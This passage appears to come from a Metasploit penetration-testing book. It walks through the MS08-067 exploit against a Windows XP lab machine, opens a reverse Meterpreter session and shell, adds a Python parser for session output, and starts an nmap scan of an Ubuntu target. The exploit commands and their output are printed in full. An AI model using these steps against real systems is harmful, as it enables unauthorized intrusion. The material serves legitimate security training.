Chapter 5
Having set the stage, we’re ready to conduct the actual exploitation:
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.33.129:8080
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1487)

msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

  Id  Type         Information  Connection
  --  ----         -----------  ----------
  1   meterpreter               192.168.33.129:8080 -> 192.168.33.130:1036

msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 4060 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
The exploit command launches the module and attempts to attack the target. The attack succeeds and hands us a reverse_tcp Meterpreter payload, which we can see with sessions -l. Only one session is active here, but if we had targeted multiple systems, several sessions could be open simultaneously. (To see which exploit created each session, enter sessions -l -v.)
The sessions -i 1 command is issued to "interact" with an individual session. Notice that this drops us into a Meterpreter shell; if the session had instead been a reverse command shell, this command would drop us straight to a command prompt. Finally, we enter shell to jump into an interactive command shell on the target.
Congratulations! You've just compromised your first machine! To see the configurable options for a particular exploit module, enter show options at the msf prompt; inside a Meterpreter session, help lists the commands Meterpreter itself provides.
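As an added example (not code from the book), here is a small Python parser for the two forms of session output shown above: the "session N opened" message that msfconsole prints and the table that sessions -l prints. Keeping session bookkeeping in a structure like this becomes useful once several sessions are open at once. The first two samples are retyped from the listing above; the third table, with its extra shell session and hosts, is constructed for illustration and is not from the page. The final check makes visible a discrepancy the listing itself contains: the open message and sessions -l report different remote ports for session 1.

```python
import re

# Constructed sample input, retyped from the listing above: the session-open
# message msfconsole prints, and the table that "sessions -l" prints afterwards.
SESSION_OPENED_LINE = (
    "[*] Meterpreter session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1487)"
)

SESSIONS_TABLE = """\
Active sessions
===============

  Id  Type         Information  Connection
  --  ----         -----------  ----------
  1   meterpreter               192.168.33.129:8080 -> 192.168.33.130:1036
"""

# Constructed second table showing what several simultaneous sessions look like.
# The shell session (id 2) and the .131 host are assumptions, not from the page.
SESSIONS_TABLE_MULTI = """\
Active sessions
===============

  Id  Type         Information           Connection
  --  ----         -----------           ----------
  1   meterpreter                        192.168.33.129:8080 -> 192.168.33.130:1036
  2   shell        Microsoft Windows XP  192.168.33.129:4444 -> 192.168.33.131:1055
  3   meterpreter                        192.168.33.129:8080 -> 192.168.33.130:1102
"""

# "LHOST:LPORT -> RHOST:RPORT" as msfconsole prints a session's connection.
CONN_RE = re.compile(
    r"(?P<lhost>[\d.]+):(?P<lport>\d+) -> (?P<rhost>[\d.]+):(?P<rport>\d+)"
)
# "[*] Meterpreter session 1 opened (...)" or "[*] Command shell session 2 opened (...)"
OPENED_RE = re.compile(
    r"\[\*\] (?P<type>[\w ]+?) session (?P<id>\d+) opened \((?P<conn>[^)]+)\)"
)
# A data row of the sessions table starts with a numeric Id, then the Type.
ROW_RE = re.compile(r"^\s*(?P<id>\d+)\s+(?P<type>\S+)\s*(?P<rest>.*)$")


def _conn_fields(match):
    """Turn a CONN_RE match into typed fields (ports as ints)."""
    d = match.groupdict()
    return {
        "lhost": d["lhost"], "lport": int(d["lport"]),
        "rhost": d["rhost"], "rport": int(d["rport"]),
    }


def parse_session_opened(line):
    """Parse a '... session N opened (L:P -> R:P)' line; None if it is not one."""
    m = OPENED_RE.search(line)
    if m is None:
        return None
    conn = CONN_RE.search(m.group("conn"))
    if conn is None:
        return None
    rec = {"id": int(m.group("id")), "type": m.group("type").lower()}
    rec.update(_conn_fields(conn))
    return rec


def parse_sessions_table(text):
    """Parse the 'Active sessions' table into a list of dicts, one per session."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m is None:          # title, ruler, header and separator lines
            continue
        conn = CONN_RE.search(m.group("rest"))
        if conn is None:       # a data row always ends in a connection tuple
            continue
        rec = {
            "id": int(m.group("id")),
            "type": m.group("type"),
            # Information may be empty, so it is whatever precedes the tuple.
            "information": m.group("rest")[:conn.start()].strip(),
        }
        rec.update(_conn_fields(conn))
        rows.append(rec)
    return rows


def sessions_for_host(rows, rhost):
    """Ids of every session on one target, e.g. to choose which one to 'sessions -i'."""
    return [r["id"] for r in rows if r["rhost"] == rhost]


def diff_connection(opened, row):
    """Connection fields that differ between the open message and the table row."""
    return {k: (opened[k], row[k])
            for k in ("lhost", "lport", "rhost", "rport") if opened[k] != row[k]}
```

Run against the listing above, diff_connection reports that the remote port in the open message (1487) does not match the one in sessions -l (1036); for a live engagement the table is the current state of the session and the open message is history, so that is the one to trust when the two disagree.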
Exploiting an Ubuntu Machine
Let’s try a different exploit on an Ubuntu 9.04 virtual machine. The steps are much the same as for the preceding exploit, except that we will select a different payload. We again start by scanning the target from within msfconsole, which passes the command through to the system's nmap (the -P0 flag is the older spelling of -Pn, which skips host discovery and scans the target even if it does not answer pings):

msf > nmap -sT -A -P0 192.168.33.132
[*] exec: nmap -sT -A -P0 192.168.33.132